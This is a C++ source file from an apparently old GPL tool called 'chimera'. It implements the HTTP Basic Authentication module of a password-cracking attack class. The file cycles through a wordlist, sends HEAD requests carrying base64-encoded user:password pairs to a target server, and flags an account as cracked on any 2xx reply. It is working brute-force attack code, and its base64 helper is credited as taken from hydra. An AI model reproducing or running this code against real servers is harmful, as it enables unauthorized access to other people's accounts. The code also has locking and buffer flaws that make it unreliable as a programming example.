/***************************************************************************
 *  service-http.cc : This file is part of 'chimera'
 *
 *  (c) 2004 by Lukasz Tomicki <tomicki@o2.pl>
 *
 ****************************************************************************/

/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Library General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */																										

#include "CServiceAttack.h"

using namespace std;

int CServiceAttack::service_http(thread_data *pData)
{
	SOCKET sock = init_connection(pData);
	char buffer1[1024];
	char buffer3[100];
	bool passwd_used(1);
	while (pData->state == WORKING) {
		if (!sock) {
			sock = init_connection(pData);
			continue;
		}
		
		if (passwd_used) {
			if (!get_next_passwd(pData, buffer3, 100)) {
				pData->state = DONE;
				continue;
			}
			passwd_used = false;
		}
		
		char buffer2[100];
		sprintf(buffer2, "%s:%s", pData->user, buffer3);
  		convert_to_base64((u8*) buffer2);
		
		char *ptr = 0, *ptr2 = 0;
		if (pData->misc) {
			ptr = pData->misc + 4;
			ptr2 = pData->misc + 8 + *pData->misc;
		}
			
		snprintf(buffer1, 1024, "HEAD %s HTTP/1.0\r\nHost: %s:%d\r\nAuthorization: Basic %s\r\nUser-Agent: Mozilla/4.0\r\n\r\n",
            ptr, ptr2, pData->ipv6 ? htons(pData->addr.sin6_port) : htons(((sockaddr_in*)&pData->addr)->sin_port), buffer2);
		
		sendAll(sock, pData->ssl, buffer1, strlen(buffer1), 0, std_timeout);
		
		if (!recvAll(sock, pData->ssl, buffer1, 1024, 0, std_timeout)) {
			close(sock);
			adjust_connections(pData);
			return 0;
		}
		
		output(MSG_VERBOSE, "trying password %s\n", buffer3);
		
		ptr = strstr(buffer1, "HTTP/1.");
		ptr = index(buffer1, ' ') + 1;

		if (*ptr == '2')
			account_cracked(pData, buffer3);
		
		passwd_used = true;
		close(sock);
		sock = 0;
	}
	close(sock);
	return 0;
}

/* 
	revision 1.4 
   
   	stolen from hydra-mod.c
*/

u8 CServiceAttack::convert_64(u8 in)
{
  if (in < 26)
    return (in + 'A');
  else if (in >= 26 && in < 52)
    return (in + 'a' - 26);
  else if (in >= 52 && in < 62)
    return (in + '0' - 52);
  else if (in == 62)
    return '+';
  else if (in == 63)
    return '/';
  else {
    return 0;
  }
}

void CServiceAttack::convert_to_base64(u8 *buf)
{
	pthread_mutex_t http_mutex = PTHREAD_MUTEX_INITIALIZER;
	pthread_mutex_lock(&http_mutex);
	unsigned char bof[200] = "";
	unsigned char small[3] = { 0, 0, 0 };
	unsigned char big[5];
	unsigned char *ptr = buf;

	if (buf == NULL || strlen((char *) buf) == 0)
		return;
	big[4] = 0;

	for (u32 i = 0; i < strlen((char *) buf) / 3; ++i) {
    	big[0] = convert_64(*ptr >> 2);
    	big[1] = convert_64(((*ptr & 3) << 4) + (*(ptr + 1) >> 4));
		big[2] = convert_64(((*(ptr + 1) & 15) << 2) + (*(ptr + 2) >> 6));
		big[3] = convert_64(*(ptr + 2) & 63);
		strcat((char *) bof, (char *) big);
		ptr += 3;
	}

	if (*ptr != 0) {
    	small[0] = *ptr;
    	if (*(ptr + 1) != 0)
      		small[1] = *(ptr + 1);
    	ptr = small;
		big[0] = convert_64(*ptr >> 2);
		big[1] = convert_64(((*ptr & 3) << 4) + (*(ptr + 1) >> 4));
		big[2] = convert_64(((*(ptr + 1) & 15) << 2) + (*(ptr + 2) >> 6));
		big[3] = convert_64(*(ptr + 2) & 63);
		if (big[1] == 'A')
    		big[1] = '=';
    	if (big[2] == 'A')
      		big[2] = '=';
    	if (big[3] == 'A')
      		big[3] = '=';
		strcat((char *) bof, (char *) big);
	}

	strcpy((char *) buf, (char *) bof);
  
	pthread_mutex_unlock(&http_mutex);
}
